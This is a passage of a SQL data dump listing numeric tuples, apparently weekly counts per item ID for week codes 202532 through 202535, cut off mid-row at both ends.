12,1,'202532',5),(4514,1,'202532',5),(4587,1,'202532',5),(4747,1,'202532',5),(4768,1,'202532',5),(4858,1,'202532',5),(4977,1,'202532',5),(5131,1,'202532',5),(5137,1,'202532',5),(5304,1,'202532',5),(5330,1,'202532',5),(469,1,'202532',6),(472,1,'202532',6),(482,1,'202532',6),(483,1,'202532',6),(485,1,'202532',6),(488,1,'202532',6),(1584,1,'202532',6),(1590,1,'202532',6),(1705,1,'202532',6),(1713,1,'202532',6),(1726,1,'202532',6),(1734,1,'202532',6),(1782,1,'202532',6),(2159,1,'202532',6),(2248,1,'202532',6),(2617,1,'202532',6),(2751,1,'202532',6),(2804,1,'202532',6),(2809,1,'202532',6),(2956,1,'202532',6),(3004,1,'202532',6),(3034,1,'202532',6),(3038,1,'202532',6),(3243,1,'202532',6),(3249,1,'202532',6),(3251,1,'202532',6),(3257,1,'202532',6),(3265,1,'202532',6),(3267,1,'202532',6),(3269,1,'202532',6),(3278,1,'202532',6),(3285,1,'202532',6),(3307,1,'202532',6),(3316,1,'202532',6),(3498,1,'202532',6),(3727,1,'202532',6),(3738,1,'202532',6),(3752,1,'202532',6),(3771,1,'202532',6),(4341,1,'202532',6),(4357,1,'202532',6),(4382,1,'202532',6),(4396,1,'202532',6),(4408,1,'202532',6),(4416,1,'202532',6),(4432,1,'202532',6),(4457,1,'202532',6),(4517,1,'202532',6),(4566,1,'202532',6),(4645,1,'202532',6),(4654,1,'202532',6),(4660,1,'202532',6),(4700,1,'202532',6),(4706,1,'202532',6),(4712,1,'202532',6),(4797,1,'202532',6),(4988,1,'202532',6),(4996,1,'202532',6),(5024,1,'202532',6),(5033,1,'202532',6),(5037,1,'202532',6),(5054,1,'202532',6),(5058,1,'202532',6),(5067,1,'202532',6),(5125,1,'202532',6),(5128,1,'202532',6),(5140,1,'202532',6),(5253,1,'202532',6),(5268,1,'202532',6),(5292,1,'202532',6),(5359,1,'202532',6),(479,1,'202532',7),(484,1,'202532',7),(1588,1,'202532',7),(1608,1,'202532',7),(1695,1,'202532',7),(1720,1,'202532',7),(1730,1,'202532',7),(1743,1,'202532',7),(1772,1,'202532',7),(2156,1,'202532',7),(2161,1,'202532',7),(2558,1,'202532',7),(2609,1,'202532',7),(2769,1,'202532',7),(3027,1,'202532',7),(3041,1,'202532',7),(3045,1,'202532',7),(3063,1,'202532',7),(3087,1,'202532',7),(3229,1,'202532',7),(3240,1,'202532',7),(3253,1,'202532',7),(3259,1,'202532',7),(3261,1,'202532',7),(3263,1,'202532',7),(3271,1,'202532',7),(3273,1,'202532',7),(3275,1,'202532',7),(3534,1,'202532',7),(3541,1,'202532',7),(3710,1,'202532',7),(3746,1,'202532',7),(3774,1,'202532',7),(4338,1,'202532',7),(4436,1,'202532',7),(4444,1,'202532',7),(4454,1,'202532',7),(4524,1,'202532',7),(4546,1,'202532',7),(4608,1,'202532',7),(4681,1,'202532',7),(4694,1,'202532',7),(4709,1,'202532',7),(4722,1,'202532',7),(4756,1,'202532',7),(4759,1,'202532',7),(4765,1,'202532',7),(4776,1,'202532',7),(4792,1,'202532',7),(4802,1,'202532',7),(4862,1,'202532',7),(4866,1,'202532',7),(4874,1,'202532',7),(4888,1,'202532',7),(4893,1,'202532',7),(4897,1,'202532',7),(4976,1,'202532',7),(5020,1,'202532',7),(5046,1,'202532',7),(5050,1,'202532',7),(5101,1,'202532',7),(5122,1,'202532',7),(5153,1,'202532',7),(5271,1,'202532',7),(5298,1,'202532',7),(5301,1,'202532',7),(5307,1,'202532',7),(5317,1,'202532',7),(5320,1,'202532',7),(5334,1,'202532',7),(478,1,'202532',8),(480,1,'202532',8),(481,1,'202532',8),(486,1,'202532',8),(1606,1,'202532',8),(1610,1,'202532',8),(1699,1,'202532',8),(1709,1,'202532',8),(1724,1,'202532',8),(1732,1,'202532',8),(1739,1,'202532',8),(1741,1,'202532',8),(1747,1,'202532',8),(1749,1,'202532',8),(1768,1,'202532',8),(1770,1,'202532',8),(1776,1,'202532',8),(1780,1,'202532',8),(2150,1,'202532',8),(2252,1,'202532',8),(2297,1,'202532',8),(2748,1,'202532',8),(2965,1,'202532',8),(3005,1,'202532',8),(3030,1,'202532',8),(3072,1,'202532',8),(3117,1,'202532',8),(3124,1,'202532',8),(3245,1,'202532',8),(3247,1,'202532',8),(3290,1,'202532',8),(3438,1,'202532',8),(3482,1,'202532',8),(3489,1,'202532',8),(3721,1,'202532',8),(3724,1,'202532',8),(3731,1,'202532',8),(3735,1,'202532',8),(3764,1,'202532',8),(4275,1,'202532',8),(4301,1,'202532',8),(4326,1,'202532',8),(4373,1,'202532',8),(4428,1,'202532',8),(4440,1,'202532',8),(4542,1,'202532',8),(4556,1,'202532',8),(4582,1,'202532',8),(4648,1,'202532',8),(4657,1,'202532',8),(4677,1,'202532',8),(4685,1,'202532',8),(4697,1,'202532',8),(4703,1,'202532',8),(4741,1,'202532',8),(4750,1,'202532',8),(4771,1,'202532',8),(5042,1,'202532',8),(5076,1,'202532',8),(5157,1,'202532',8),(5163,1,'202532',8),(5289,1,'202532',8),(5363,1,'202532',8),(5383,1,'202532',8),(1612,1,'202532',9),(1703,1,'202532',9),(1707,1,'202532',9),(1711,1,'202532',9),(1715,1,'202532',9),(1722,1,'202532',9),(1728,1,'202532',9),(1737,1,'202532',9),(1774,1,'202532',9),(2165,1,'202532',9),(2457,1,'202532',9),(2658,1,'202532',9),(2993,1,'202532',9),(3079,1,'202532',9),(3226,1,'202532',9),(3479,1,'202532',9),(3486,1,'202532',9),(3531,1,'202532',9),(3749,1,'202532',9),(4329,1,'202532',9),(4377,1,'202532',9),(4424,1,'202532',9),(4651,1,'202532',9),(4753,1,'202532',9),(4883,1,'202532',9),(4983,1,'202532',9),(5062,1,'202532',9),(5071,1,'202532',9),(5146,1,'202532',9),(5248,1,'202532',9),(5295,1,'202532',9),(5314,1,'202532',9),(5323,1,'202532',9),(5353,1,'202532',9),(5374,1,'202532',9),(5472,1,'202532',9),(476,1,'202532',10),(477,1,'202532',10),(1604,1,'202532',10),(1751,1,'202532',10),(1766,1,'202532',10),(1778,1,'202532',10),(2063,1,'202532',10),(2148,1,'202532',10),(2801,1,'202532',10),(2964,1,'202532',10),(3066,1,'202532',10),(3069,1,'202532',10),(3777,1,'202532',10),(4323,1,'202532',10),(4363,1,'202532',10),(4448,1,'202532',10),(4529,1,'202532',10),(5259,1,'202532',10),(5264,1,'202532',10),(5356,1,'202532',10),(5467,1,'202532',10),(467,1,'202532',11),(570,1,'202532',11),(1701,1,'202532',11),(2152,1,'202532',11),(2178,1,'202532',11),(2775,1,'202532',11),(3127,1,'202532',11),(3297,1,'202532',11),(3742,1,'202532',11),(4420,1,'202532',11),(4551,1,'202532',11),(4688,1,'202532',11),(5310,1,'202532',11),(5378,1,'202532',11),(5400,1,'202532',11),(5433,1,'202532',11),(473,1,'202532',12),(1718,1,'202532',12),(2154,1,'202532',12),(2309,1,'202532',12),(4520,1,'202532',12),(5276,1,'202532',12),(5280,1,'202532',12),(5457,1,'202532',12),(74,1,'202532',13),(3313,1,'202532',13),(3430,1,'202532',13),(487,1,'202532',14),(1544,1,'202532',14),(1745,1,'202532',14),(3023,1,'202532',14),(4612,1,'202532',14),(5412,1,'202532',14),(470,1,'202532',15),(5397,1,'202532',15),(5454,1,'202532',15),(5464,1,'202532',15),(5489,1,'202532',15),(468,1,'202532',16),(1598,1,'202532',16),(3083,1,'202532',16),(1614,1,'202532',17),(5409,1,'202532',17),(5461,1,'202532',18),(474,1,'202532',19),(1586,1,'202532',20),(2911,1,'202532',20),(5425,1,'202532',20),(2813,1,'202532',21),(5436,1,'202532',21),(5420,1,'202532',22),(84,1,'202532',23),(3781,1,'202532',24),(5406,1,'202532',24),(5415,1,'202532',24),(3060,1,'202532',25),(108,1,'202532',26),(5449,1,'202532',26),(5515,1,'202532',26),(4930,1,'202532',27),(87,1,'202532',28),(1582,1,'202532',28),(5512,1,'202532',29),(5441,1,'202532',30),(5492,1,'202532',30),(5428,1,'202532',31),(5502,1,'202532',33),(91,1,'202532',35),(2904,1,'202532',40),(335,1,'202532',46),(2503,1,'202532',48),(89,1,'202532',52),(76,1,'202532',54),(5561,1,'202532',71),(72,1,'202532',83),(68,1,'202532',99),(80,1,'202532',144),(9,1,'202532',2606),(110,1,'202533',1),(1751,1,'202533',1),(1772,1,'202533',1),(2293,1,'202533',1),(3079,1,'202533',1),(3107,1,'202533',1),(3229,1,'202533',1),(3267,1,'202533',1),(3278,1,'202533',1),(3280,1,'202533',1),(3287,1,'202533',1),(3486,1,'202533',1),(4357,1,'202533',1),(4428,1,'202533',1),(4436,1,'202533',1),(4440,1,'202533',1),(4444,1,'202533',1),(4546,1,'202533',1),(4866,1,'202533',1),(4893,1,'202533',1),(106,1,'202533',2),(486,1,'202533',2),(1697,1,'202533',2),(1699,1,'202533',2),(1707,1,'202533',2),(1711,1,'202533',2),(1720,1,'202533',2),(1737,1,'202533',2),(2063,1,'202533',2),(2161,1,'202533',2),(2165,1,'202533',2),(2178,1,'202533',2),(2248,1,'202533',2),(2989,1,'202533',2),(3097,1,'202533',2),(3104,1,'202533',2),(3109,1,'202533',2),(3127,1,'202533',2),(3240,1,'202533',2),(3253,1,'202533',2),(3257,1,'202533',2),(3269,1,'202533',2),(3273,1,'202533',2),(3275,1,'202533',2),(3430,1,'202533',2),(3498,1,'202533',2),(4341,1,'202533',2),(4363,1,'202533',2),(4373,1,'202533',2),(4382,1,'202533',2),(4387,1,'202533',2),(4424,1,'202533',2),(4542,1,'202533',2),(4587,1,'202533',2),(4657,1,'202533',2),(4674,1,'202533',2),(4681,1,'202533',2),(4744,1,'202533',2),(4802,1,'202533',2),(4858,1,'202533',2),(4983,1,'202533',2),(4988,1,'202533',2),(5253,1,'202533',2),(5295,1,'202533',2),(479,1,'202533',3),(482,1,'202533',3),(483,1,'202533',3),(488,1,'202533',3),(1584,1,'202533',3),(1701,1,'202533',3),(1703,1,'202533',3),(1705,1,'202533',3),(1713,1,'202533',3),(1715,1,'202533',3),(1732,1,'202533',3),(1741,1,'202533',3),(1768,1,'202533',3),(1782,1,'202533',3),(2148,1,'202533',3),(2150,1,'202533',3),(2156,1,'202533',3),(2159,1,'202533',3),(2457,1,'202533',3),(2751,1,'202533',3),(2801,1,'202533',3),(2993,1,'202533',3),(3027,1,'202533',3),(3090,1,'202533',3),(3245,1,'202533',3),(3249,1,'202533',3),(3251,1,'202533',3),(3282,1,'202533',3),(3285,1,'202533',3),(3307,1,'202533',3),(3316,1,'202533',3),(3738,1,'202533',3),(3771,1,'202533',3),(4326,1,'202533',3),(4377,1,'202533',3),(4404,1,'202533',3),(4432,1,'202533',3),(4448,1,'202533',3),(4454,1,'202533',3),(4566,1,'202533',3),(4663,1,'202533',3),(4668,1,'202533',3),(4685,1,'202533',3),(4688,1,'202533',3),(4691,1,'202533',3),(4697,1,'202533',3),(4706,1,'202533',3),(4722,1,'202533',3),(4753,1,'202533',3),(4771,1,'202533',3),(4776,1,'202533',3),(4792,1,'202533',3),(4797,1,'202533',3),(4862,1,'202533',3),(4870,1,'202533',3),(4878,1,'202533',3),(4883,1,'202533',3),(4897,1,'202533',3),(4976,1,'202533',3),(4996,1,'202533',3),(5028,1,'202533',3),(5037,1,'202533',3),(5122,1,'202533',3),(5137,1,'202533',3),(5146,1,'202533',3),(5248,1,'202533',3),(5268,1,'202533',3),(5289,1,'202533',3),(477,1,'202533',4),(478,1,'202533',4),(481,1,'202533',4),(485,1,'202533',4),(1695,1,'202533',4),(1709,1,'202533',4),(1726,1,'202533',4),(1730,1,'202533',4),(1747,1,'202533',4),(1770,1,'202533',4),(2152,1,'202533',4),(2252,1,'202533',4),(2609,1,'202533',4),(2617,1,'202533',4),(2658,1,'202533',4),(3006,1,'202533',4),(3038,1,'202533',4),(3096,1,'202533',4),(3263,1,'202533',4),(3265,1,'202533',4),(3541,1,'202533',4),(3731,1,'202533',4),(3752,1,'202533',4),(3764,1,'202533',4),(3774,1,'202533',4),(4238,1,'202533',4),(4338,1,'202533',4),(4368,1,'202533',4),(4391,1,'202533',4),(4396,1,'202533',4),(4408,1,'202533',4),(4416,1,'202533',4),(4420,1,'202533',4),(4517,1,'202533',4),(4551,1,'202533',4),(4591,1,'202533',4),(4648,1,'202533',4),(4651,1,'202533',4),(4654,1,'202533',4),(4660,1,'202533',4),(4677,1,'202533',4),(4694,1,'202533',4),(4700,1,'202533',4),(4709,1,'202533',4),(4874,1,'202533',4),(4888,1,'202533',4),(4977,1,'202533',4),(5020,1,'202533',4),(5033,1,'202533',4),(5046,1,'202533',4),(5050,1,'202533',4),(5080,1,'202533',4),(5125,1,'202533',4),(5140,1,'202533',4),(5153,1,'202533',4),(5264,1,'202533',4),(5271,1,'202533',4),(5276,1,'202533',4),(5280,1,'202533',4),(5298,1,'202533',4),(102,1,'202533',5),(480,1,'202533',5),(570,1,'202533',5),(1612,1,'202533',5),(1739,1,'202533',5),(1743,1,'202533',5),(1749,1,'202533',5),(1776,1,'202533',5),(1780,1,'202533',5),(2809,1,'202533',5),(3004,1,'202533',5),(3030,1,'202533',5),(3034,1,'202533',5),(3045,1,'202533',5),(3072,1,'202533',5),(3092,1,'202533',5),(3102,1,'202533',5),(3243,1,'202533',5),(3247,1,'202533',5),(3261,1,'202533',5),(3290,1,'202533',5),(3438,1,'202533',5),(3489,1,'202533',5),(3721,1,'202533',5),(3727,1,'202533',5),(4332,1,'202533',5),(4335,1,'202533',5),(4412,1,'202533',5),(4457,1,'202533',5),(4520,1,'202533',5),(4524,1,'202533',5),(4529,1,'202533',5),(4608,1,'202533',5),(4741,1,'202533',5),(4747,1,'202533',5),(4756,1,'202533',5),(4762,1,'202533',5),(4765,1,'202533',5),(5058,1,'202533',5),(5071,1,'202533',5),(5101,1,'202533',5),(5128,1,'202533',5),(5320,1,'202533',5),(5330,1,'202533',5),(5334,1,'202533',5),(5359,1,'202533',5),(5472,1,'202533',5),(471,1,'202533',6),(476,1,'202533',6),(1600,1,'202533',6),(1608,1,'202533',6),(1718,1,'202533',6),(1722,1,'202533',6),(1774,1,'202533',6),(2154,1,'202533',6),(2297,1,'202533',6),(2558,1,'202533',6),(2769,1,'202533',6),(2911,1,'202533',6),(2965,1,'202533',6),(3041,1,'202533',6),(3063,1,'202533',6),(3117,1,'202533',6),(3124,1,'202533',6),(3271,1,'202533',6),(3531,1,'202533',6),(3714,1,'202533',6),(3724,1,'202533',6),(3735,1,'202533',6),(4275,1,'202533',6),(4323,1,'202533',6),(4329,1,'202533',6),(4400,1,'202533',6),(4514,1,'202533',6),(4645,1,'202533',6),(4703,1,'202533',6),(4759,1,'202533',6),(4768,1,'202533',6),(5024,1,'202533',6),(5054,1,'202533',6),(5076,1,'202533',6),(5131,1,'202533',6),(5134,1,'202533',6),(5307,1,'202533',6),(5314,1,'202533',6),(5317,1,'202533',6),(5383,1,'202533',6),(472,1,'202533',7),(484,1,'202533',7),(1602,1,'202533',7),(1766,1,'202533',7),(2748,1,'202533',7),(2991,1,'202533',7),(3087,1,'202533',7),(3297,1,'202533',7),(3479,1,'202533',7),(3742,1,'202533',7),(3746,1,'202533',7),(4301,1,'202533',7),(4980,1,'202533',7),(5292,1,'202533',7),(5310,1,'202533',7),(5326,1,'202533',7),(5353,1,'202533',7),(5374,1,'202533',7),(469,1,'202533',8),(1596,1,'202533',8),(1604,1,'202533',8),(1610,1,'202533',8),(1724,1,'202533',8),(1734,1,'202533',8),(1778,1,'202533',8),(2704,1,'202533',8),(3066,1,'202533',8),(3226,1,'202533',8),(3259,1,'202533',8),(3313,1,'202533',8),(3482,1,'202533',8),(3534,1,'202533',8),(3777,1,'202533',8),(4582,1,'202533',8),(4712,1,'202533',8),(4750,1,'202533',8),(5042,1,'202533',8),(5157,1,'202533',8),(5356,1,'202533',8),(5433,1,'202533',8),(5467,1,'202533',8),(1588,1,'202533',9),(1590,1,'202533',9),(1592,1,'202533',9),(1594,1,'202533',9),(1745,1,'202533',9),(2309,1,'202533',9),(2775,1,'202533',9),(2964,1,'202533',9),(3005,1,'202533',9),(3069,1,'202533',9),(3710,1,'202533',9),(4556,1,'202533',9),(5301,1,'202533',9),(5304,1,'202533',9),(5363,1,'202533',9),(5400,1,'202533',9),(5412,1,'202533',9),(1728,1,'202533',10),(2956,1,'202533',10),(5163,1,'202533',10),(5256,1,'202533',10),(5259,1,'202533',10),(5323,1,'202533',10),(1606,1,'202533',11),(1614,1,'202533',11),(3023,1,'202533',11),(4612,1,'202533',11),(5378,1,'202533',11),(467,1,'202533',12),(3749,1,'202533',12),(5425,1,'202533',12),(5492,1,'202533',12),(470,1,'202533',13),(1598,1,'202533',13),(5415,1,'202533',13),(5461,1,'202533',13),(473,1,'202533',14),(1544,1,'202533',14),(3083,1,'202533',14),(5062,1,'202533',14),(5449,1,'202533',14),(5454,1,'202533',14),(5457,1,'202533',15),(2804,1,'202533',16),(5406,1,'202533',16),(5578,1,'202533',16),(5489,1,'202533',17),(468,1,'202533',18),(474,1,'202533',18),(487,1,'202533',18),(3781,1,'202533',18),(5436,1,'202533',19),(5409,1,'202533',20),(5441,1,'202533',20),(5464,1,'202533',20),(2813,1,'202533',21),(4930,1,'202533',21),(74,1,'202533',22),(5397,1,'202533',22),(5515,1,'202533',22),(1586,1,'202533',23),(5428,1,'202533',24),(84,1,'202533',25),(5067,1,'202533',27),(5502,1,'202533',27),(5512,1,'202533',27),(87,1,'202533',28),(5420,1,'202533',29),(108,1,'202533',30),(1582,1,'202533',35),(91,1,'202533',40),(335,1,'202533',42),(2503,1,'202533',42),(3060,1,'202533',42),(2904,1,'202533',43),(89,1,'202533',52),(76,1,'202533',60),(5567,1,'202533',62),(5561,1,'202533',64),(72,1,'202533',65),(68,1,'202533',87),(5570,1,'202533',133),(80,1,'202533',527),(9,1,'202533',3119),(110,1,'202534',2),(106,1,'202534',3),(1695,1,'202534',3),(3714,1,'202534',3),(2991,1,'202534',4),(3038,1,'202534',4),(3287,1,'202534',4),(3092,1,'202534',5),(3280,1,'202534',5),(4357,1,'202534',5),(4668,1,'202534',5),(4858,1,'202534',5),(5028,1,'202534',5),(5268,1,'202534',5),(102,1,'202534',6),(1596,1,'202534',6),(1734,1,'202534',6),(3096,1,'202534',6),(3097,1,'202534',6),(3104,1,'202534',6),(3282,1,'202534',6),(3746,1,'202534',6),(4391,1,'202534',6),(4591,1,'202534',6),(4691,1,'202534',6),(5326,1,'202534',6),(2297,1,'202534',7),(3109,1,'202534',7),(3541,1,'202534',7),(4674,1,'202534',7),(4744,1,'202534',7),(4870,1,'202534',7),(3090,1,'202534',8),(3107,1,'202534',8),(4238,1,'202534',8),(4400,1,'202534',8),(4587,1,'202534',8),(4663,1,'202534',8),(4977,1,'202534',8),(5140,1,'202534',8),(5256,1,'202534',8),(5489,1,'202534',8),(1588,1,'202534',9),(1602,1,'202534',9),(1697,1,'202534',9),(4404,1,'202534',9),(4762,1,'202534',9),(4768,1,'202534',9),(4980,1,'202534',9),(5080,1,'202534',9),(1606,1,'202534',10),(5134,1,'202534',10),(1592,1,'202534',11),(3297,1,'202534',11),(4387,1,'202534',11),(4878,1,'202534',11),(2178,1,'202534',14),(2293,1,'202534',14),(1709,1,'202534',15),(1728,1,'202534',15),(2296,1,'202534',15),(3087,1,'202534',15),(3226,1,'202534',15),(4694,1,'202534',15),(4883,1,'202534',15),(5301,1,'202534',15),(1713,1,'202534',16),(1732,1,'202534',16),(2152,1,'202534',16),(2558,1,'202534',16),(2989,1,'202534',16),(3066,1,'202534',16),(3072,1,'202534',16),(3438,1,'202534',16),(3498,1,'202534',16),(3721,1,'202534',16),(3727,1,'202534',16),(3735,1,'202534',16),(3742,1,'202534',16),(4335,1,'202534',16),(4408,1,'202534',16),(4416,1,'202534',16),(4436,1,'202534',16),(4517,1,'202534',16),(4776,1,'202534',16),(4897,1,'202534',16),(5037,1,'202534',16),(5042,1,'202534',16),(5046,1,'202534',16),(5050,1,'202534',16),(5054,1,'202534',16),(5457,1,'202534',16),(1610,1,'202534',17),(1701,1,'202534',17),(1720,1,'202534',17),(1730,1,'202534',17),(1743,1,'202534',17),(1745,1,'202534',17),(1747,1,'202534',17),(1749,1,'202534',17),(1751,1,'202534',17),(1772,1,'202534',17),(2165,1,'202534',17),(2609,1,'202534',17),(2748,1,'202534',17),(2911,1,'202534',17),(2964,1,'202534',17),(3004,1,'202534',17),(3045,1,'202534',17),(3063,1,'202534',17),(3079,1,'202534',17),(3247,1,'202534',17),(3273,1,'202534',17),(3307,1,'202534',17),(3316,1,'202534',17),(3430,1,'202534',17),(3738,1,'202534',17),(4338,1,'202534',17),(4396,1,'202534',17),(4432,1,'202534',17),(4706,1,'202534',17),(4709,1,'202534',17),(4741,1,'202534',17),(4888,1,'202534',17),(4893,1,'202534',17),(5020,1,'202534',17),(5033,1,'202534',17),(5128,1,'202534',17),(5383,1,'202534',17),(479,1,'202534',18),(570,1,'202534',18),(1699,1,'202534',18),(1711,1,'202534',18),(1741,1,'202534',18),(1766,1,'202534',18),(1768,1,'202534',18),(2063,1,'202534',18),(2148,1,'202534',18),(2154,1,'202534',18),(2159,1,'202534',18),(2161,1,'202534',18),(2252,1,'202534',18),(2704,1,'202534',18),(3006,1,'202534',18),(3034,1,'202534',18),(3069,1,'202534',18),(3102,1,'202534',18),(3117,1,'202534',18),(3240,1,'202534',18),(3243,1,'202534',18),(3257,1,'202534',18),(3265,1,'202534',18),(3269,1,'202534',18),(3271,1,'202534',18),(3482,1,'202534',18),(3486,1,'202534',18),(3531,1,'202534',18),(3534,1,'202534',18),(3710,1,'202534',18),(3774,1,'202534',18),(3777,1,'202534',18),(4341,1,'202534',18),(4382,1,'202534',18),(4428,1,'202534',18),(4448,1,'202534',18),(4514,1,'202534',18),(4546,1,'202534',18),(4645,1,'202534',18),(4654,1,'202534',18),(4657,1,'202534',18),(4681,1,'202534',18),(4688,1,'202534',18),(4697,1,'202534',18),(4712,1,'202534',18),(4722,1,'202534',18),(4792,1,'202534',18),(4802,1,'202534',18),(5122,1,'202534',18),(5292,1,'202534',18),(5320,1,'202534',18),(5374,1,'202534',18),(5441,1,'202534',18),(480,1,'202534',19),(1584,1,'202534',19),(1604,1,'202534',19),(1703,1,'202534',19),(1707,1,'202534',19),(1715,1,'202534',19),(1726,1,'202534',19),(1739,1,'202534',19),(2150,1,'202534',19),(2156,1,'202534',19),(2658,1,'202534',19),(2965,1,'202534',19),(3005,1,'202534',19),(3249,1,'202534',19),(3261,1,'202534',19),(3263,1,'202534',19),(3267,1,'202534',19),(3275,1,'202534',19),(3285,1,'202534',19),(3479,1,'202534',19),(3489,1,'202534',19),(3731,1,'202534',19),(3764,1,'202534',19),(4373,1,'202534',19),(4412,1,'202534',19),(4420,1,'202534',19),(4424,1,'202534',19),(4440,1,'202534',19),(4677,1,'202534',19),(4685,1,'202534',19),(4700,1,'202534',19),(4703,1,'202534',19),(4759,1,'202534',19),(4862,1,'202534',19),(4874,1,'202534',19),(5024,1,'202534',19),(5125,1,'202534',19),(5271,1,'202534',19),(5304,1,'202534',19),(5310,1,'202534',19),(5317,1,'202534',19),(5334,1,'202534',19),(5353,1,'202534',19),(5378,1,'202534',19),(5472,1,'202534',19),(481,1,'202534',20),(1594,1,'202534',20),(1718,1,'202534',20),(1737,1,'202534',20),(1770,1,'202534',20),(1774,1,'202534',20),(1782,1,'202534',20),(2248,1,'202534',20),(2769,1,'202534',20),(2801,1,'202534',20),(2956,1,'202534',20),(3027,1,'202534',20),(3251,1,'202534',20),(3253,1,'202534',20),(3290,1,'202534',20),(3724,1,'202534',20),(3752,1,'202534',20),(4275,1,'202534',20),(4329,1,'202534',20),(4363,1,'202534',20),(4377,1,'202534',20),(4454,1,'202534',20),(4457,1,'202534',20),(4542,1,'202534',20),(4556,1,'202534',20),(4582,1,'202534',20),(4648,1,'202534',20),(4651,1,'202534',20),(4866,1,'202534',20),(4996,1,'202534',20),(5137,1,'202534',20),(5253,1,'202534',20),(5276,1,'202534',20),(5289,1,'202534',20),(5295,1,'202534',20),(5307,1,'202534',20),(5415,1,'202534',20),(5425,1,'202534',20),(5464,1,'202534',20),(478,1,'202534',21),(484,1,'202534',21),(1590,1,'202534',21),(1705,1,'202534',21),(1724,1,'202534',21),(1776,1,'202534',21),(2751,1,'202534',21),(2775,1,'202534',21),(3030,1,'202534',21),(3229,1,'202534',21),(3278,1,'202534',21),(3771,1,'202534',21),(4326,1,'202534',21),(4524,1,'202534',21),(4551,1,'202534',21),(4608,1,'202534',21),(4747,1,'202534',21),(4756,1,'202534',21),(5076,1,'202534',21),(5101,1,'202534',21),(5163,1,'202534',21),(5248,1,'202534',21),(5314,1,'202534',21),(5330,1,'202534',21),(5492,1,'202534',21),(476,1,'202534',22),(477,1,'202534',22),(482,1,'202534',22),(483,1,'202534',22),(485,1,'202534',22),(486,1,'202534',22),(1608,1,'202534',22),(1614,1,'202534',22),(1722,1,'202534',22),(1780,1,'202534',22),(3041,1,'202534',22),(3124,1,'202534',22),(3127,1,'202534',22),(3245,1,'202534',22),(3259,1,'202534',22),(4332,1,'202534',22),(4529,1,'202534',22),(4660,1,'202534',22),(4765,1,'202534',22),(4797,1,'202534',22),(5323,1,'202534',22),(5359,1,'202534',22),(471,1,'202534',23),(488,1,'202534',23),(1586,1,'202534',23),(1612,1,'202534',23),(2457,1,'202534',23),(2617,1,'202534',23),(2804,1,'202534',23),(3749,1,'202534',23),(4301,1,'202534',23),(4444,1,'202534',23),(4566,1,'202534',23),(4753,1,'202534',23),(4983,1,'202534',23),(4988,1,'202534',23),(5058,1,'202534',23),(5153,1,'202534',23),(469,1,'202534',24),(2809,1,'202534',24),(3313,1,'202534',24),(4323,1,'202534',24),(4771,1,'202534',24),(4976,1,'202534',24),(5071,1,'202534',24),(5131,1,'202534',24),(5146,1,'202534',24),(5298,1,'202534',24),(5397,1,'202534',24),(472,1,'202534',25),(2993,1,'202534',25),(3083,1,'202534',25),(4612,1,'202534',25),(5062,1,'202534',25),(5067,1,'202534',25),(5264,1,'202534',25),(5363,1,'202534',25),(5461,1,'202534',25),(5567,1,'202534',25),(487,1,'202534',26),(3023,1,'202534',26),(4520,1,'202534',26),(5157,1,'202534',26),(5356,1,'202534',26),(5428,1,'202534',26),(467,1,'202534',27),(468,1,'202534',27),(470,1,'202534',27),(1600,1,'202534',27),(2309,1,'202534',27),(2813,1,'202534',27),(5280,1,'202534',27),(5409,1,'202534',27),(5436,1,'202534',27),(4750,1,'202534',29),(5400,1,'202534',29),(5454,1,'202534',29),(473,1,'202534',30),(5433,1,'202534',30),(5515,1,'202534',31),(1544,1,'202534',32),(1778,1,'202534',32),(5412,1,'202534',32),(5449,1,'202534',32),(5512,1,'202534',33),(5259,1,'202534',35),(474,1,'202534',36),(74,1,'202534',37),(1598,1,'202534',38),(5420,1,'202534',38),(3781,1,'202534',39),(4930,1,'202534',40),(4368,1,'202534',41),(5467,1,'202534',41),(84,1,'202534',42),(87,1,'202534',42),(5406,1,'202534',42),(5570,1,'202534',42),(108,1,'202534',45),(5502,1,'202534',45),(5578,1,'202534',48),(5585,1,'202534',50),(5561,1,'202534',52),(91,1,'202534',55),(1582,1,'202534',58),(2904,1,'202534',59),(76,1,'202534',62),(335,1,'202534',65),(2503,1,'202534',69),(5582,1,'202534',91),(89,1,'202534',92),(68,1,'202534',93),(3060,1,'202534',123),(72,1,'202534',134),(80,1,'202534',2590),(9,1,'202534',4546),(4858,1,'202535',3),(106,1,'202535',4),(110,1,'202535',5),(1592,1,'202535',5),(1596,1,'202535',5),(1602,1,'202535',5),(3280,1,'202535',5),(4387,1,'202535',5),(4404,1,'202535',5),(5028,1,'202535',5),(1695,1,'202535',6),(3104,1,'202535',6),(3107,1,'202535',6),(3282,1,'202535',6),(4238,1,'202535',6),(4591,1,'202535',6),(4691,1,'202535',6),(4744,1,'202535',6),(4878,1,'202535',6),(1697,1,'202535',7),(1734,1,'202535',7),(2297,1,'202535',7),(2991,1,'202535',7),(3092,1,'202535',7),(3109,1,'202535',7),(3287,1,'202535',7),(3297,1,'202535',7),(4357,1,'202535',7),(4391,1,'202535',7),(4663,1,'202535',7),(4762,1,'202535',7),(4977,1,'202535',7),(5256,1,'202535',7),(5326,1,'202535',7),(3038,1,'202535',8),(4587,1,'202535',8),(4870,1,'202535',8),(102,1,'202535',9),(1588,1,'202535',9),(3090,1,'202535',9),(3714,1,'202535',9),(3746,1,'202535',9),(4400,1,'202535',9),(4668,1,'202535',9),(4768,1,'202535',9),(5134,1,'202535',9),(5140,1,'202535',9),(3541,1,'202535',10),(4674,1,'202535',10),(4776,1,'202535',10),(1606,1,'202535',11),(3096,1,'202535',11),(3097,1,'202535',11),(3247,1,'202535',11),(3269,1,'202535',11),(4363,1,'202535',11),(4428,1,'202535',11),(4436,1,'202535',11),(4802,1,'202535',11),(5024,1,'202535',11),(5080,1,'202535',11),(5289,1,'202535',11),(5295,1,'202535',11),(2156,1,'202535',12),(2293,1,'202535',12),(2296,1,'202535',12),(3102,1,'202535',12),(3251,1,'202535',12),(3253,1,'202535',12),(3261,1,'202535',12),(3263,1,'202535',12),(4382,1,'202535',12),(4408,1,'202535',12),(4677,1,'202535',12),(4685,1,'202535',12),(4792,1,'202535',12),(5268,1,'202535',12),(1739,1,'202535',13),(2063,1,'202535',13),(2154,1,'202535',13),(3229,1,'202535',13),(3243,1,'202535',13),(3271,1,'202535',13),(3738,1,'202535',13),(4332,1,'202535',13),(4520,1,'202535',13),(4797,1,'202535',13),(4883,1,'202535',13),(5020,1,'202535',13),(570,1,'202535',14),(1709,1,'202535',14),(1715,1,'202535',14),(1747,1,'202535',14),(1749,1,'202535',14),(2148,1,'202535',14),(2161,1,'202535',14),(2252,1,'202535',14),(